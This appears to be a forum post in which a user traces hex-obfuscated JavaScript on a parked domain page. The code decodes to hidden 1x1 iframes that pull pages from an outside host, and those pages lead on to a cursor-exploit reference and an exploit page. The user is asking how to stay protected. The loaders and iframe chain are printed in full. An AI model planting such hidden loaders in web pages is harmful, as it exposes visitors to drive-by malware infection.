I stumbled upon a seemingly empty site. One of those where whatever it was before it is now no more
except for a domain name now offered for sale. Literally it says "This domain name is for sale. Click
Here to inquire." All quite innocuous, except I notice two, rather out of place, tiny gray squares at
the end of the text and wondered what they were for. When I go into the source, I see, surprisingly,
two lines of 'hex-cloaked' javascript, namely:
eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%6d%65%64%69%61%63%6f%75%6e%74%2e%6e%65%74%2f%73%74%72%6f%6e%67%2f%30%35%30%2f%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));
eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%6d%65%64%69%61%63%6f%75%6e%74%2e%6e%65%74%2f%64%6c%2f%6e%65%77%6e%65%77%2e%70%68%70%3f%61%64%76%3d%35%30%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));
When I decode these, they become
document.write('<iframe src=
http://mediacount.net/strong/050/ width=1 height=1></iframe>');
document.write('<iframe src=
http://mediacount.net/dl/newnew.php?adv=50 width=1 height=1></iframe>');
Now I wonder what this is about. So I go to the first link and all I get is another page, blank except
for one of those little squares. Going into the source, it's another hex-encoded line:
document.write(unescape("%3c%73%74%79%6c%65%3e%20%2a%20%7b%43%55%52%53%4f%52%3a%20%75%72%6c%28%22%33%32%34%31%32%33%2e%68%74%6d%22%29%7d%20%3c%2f%73%74%79%6c%65%3e%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%31%2e%68%74%6d%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e"));
This one in turn decodes to:
<style> * {CURSOR: url("324123.htm")} </style>
<iframe src="exp1.htm" width="1" height="1"></iframe>
I skip the CSS part and just paste the exp1.htm onto the end of link I'm now at, i.e. I now go to
visit
http://mediacount.net/strong/050/exp1.htm. Well, now unsurprisingly, it looks just like where I
came from: a blank page with a tiny gray square. This time, though the source containly a massively
longer hex string, about 16k of characters, which I won't bother to reproduce. And when decoded, it's
also a much more sophisticated javascript program which tries to do nasty things like shell executes
and program loads -- I haven't taken the time to study this one very closely, nor to trace out the other
first link.
Anyway, I have little background in any of this so really am pretty clueless as to what I've gotten
into. But it doesn't look good and where it exists in one place it undoubtedly exists in others. So if
anyone could shed a bit more light on what all this is and what if any needs to be done to be
protected from it, I think a great many would be appreciative. Oh, and the starting URL where
all this began is the now apparently defunct site
http://www.erotictravel.com/